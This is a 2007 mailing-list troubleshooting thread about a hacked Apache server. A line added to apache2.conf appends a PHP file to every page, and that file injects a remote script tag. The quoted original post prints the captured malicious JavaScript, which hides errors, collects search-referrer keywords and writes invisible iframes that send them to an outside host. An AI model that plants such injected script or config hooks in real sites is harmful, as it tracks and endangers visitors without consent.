Re: been hacked ?

Hi,

I have find out the problem,

in /etc/apache2/apache2.conf it was
this line php_value auto_append_file "/usr/local/lib/php/stat.php"

#
# Filters allow you to process content before it is sent to the client.
#
# To parse .shtml files for server-side includes (SSI):
# (You will also need to add "Includes" to the "Options" directive.)
#
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
AddType application/x-httpd-php .html
AddType application/x-httpd-php .htm
php_value auto_append_file "/usr/local/lib/php/stat.php"

then opening /usr/local/lib/php/stat.php

i have seen the bad string,

<script src="http://wymiana.org/stat/script_vip.php?user=2254";></script>

look like an SSI attack, but still not idea how .

On 5/30/07, d3l user <d3luser@gmail.com> wrote:
> while browsing through a web page hosted on my web server I have seen
> in the firefox page source the following line:
>
> <script src="http://wymiana.org/stat/script_vip.php?user=2254 "></script>
>
>
> subsequently I have opened with vim the file index.php located on the 
> server,
> and there's no trace about that line . This happens also wit static html pages.
>
>
> any idea about ?
>
>
> following you can find the tcpdum stream
>
>
> thanks in advance,
>
> delUser
>
>
>
>
>
> GET /mystat/2.js?host=wymiana.org HTTP/1.1
>
> Host: rejestr.org
>
> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3)
> Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)
>
> Accept: */*
>
> Accept-Language: en-us,en;q=0.5
>
> Accept-Encoding: gzip,deflate
>
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>
> Keep-Alive: 300
>
> Connection: keep-alive
>
> Referer: http://www.mywebsite.com/
>
>
>
> HTTP/1.1 200 OK
>
> Date: Tue, 29 May 2007 19:46:27 GMT
>
> Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8
> mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 mod_ssl/2.8.27
> OpenSSL/0.9.7a
>
> X-Powered-By: PHP/4.4.2
>
> Connection: close
>
> Transfer-Encoding: chunked
>
> Content-Type: text/html
>
>
>
> 53d
>
> function stopErrors(){return true;}window.onerror=stopErrors;
> function getJS(v,r)
> {
> q = r.toString ();
> var p = q.indexOf('?');
> if (p > 0) {q = q.substring(p+1);}
> var vs = q.split("&");
> for (var i=0;i<vs.length;i++)
> {
> var pr = vs[i].split("=");
> if (pr[0] == v) {return pr[1];}
> }
> }
> var q="";
> var r="";
> try {
> if (top.document.referrer) {r=top.document.referrer;}
> else if (document.referrer)  {r=document.referrer;};
> }catch (e) {};
> if (r !=="")
> {
> if (r.indexOf("google.") !== -1) {q="q";};
> if (r.indexOf("msn.com") !== -1) {q="q";};
> if (r.indexOf("altavista.") !== -1) {q="q";};
> if (r.indexOf("yahoo.") !== -1) {q="p";};
> if (r.indexOf("netsprint.") !== -1) {q="q";};
> if (r.indexOf("onet.pl") !== -1) {q="qt";};
> if (r.indexOf(" wp.pl") !== -1) {q="szukaj";};
> if (r.indexOf("interia.pl") !== -1) {q="q";};
> if (r.indexOf("szukacz.pl") !== -1) {q="q";};
> if (r.indexOf("o2.pl") !== -1) {q="qt";};
> }
> var vars="";
> if ((r !=="") && (q!==""))
> {
> vars=getJS(q,r);
> }
> if (vars=="undefined") {vars="";};
> if (vars!=="") {vars=vars +"&src=se";};
> if (vars!==""){
> document.write("<iframe frameborder=0 style='width:0px; height:0px'
> src=\"http://rejestr.org/mystat/2.php?id="+self.location+"&topkey="+vars+"\";></iframe>")
>
> }else
> document.write("<iframe frameborder=0 style='width:0px; height:0px'
> src=http://rejestr.org/mystat/2.php?id="+self.location+";></iframe>")
>
>
> 0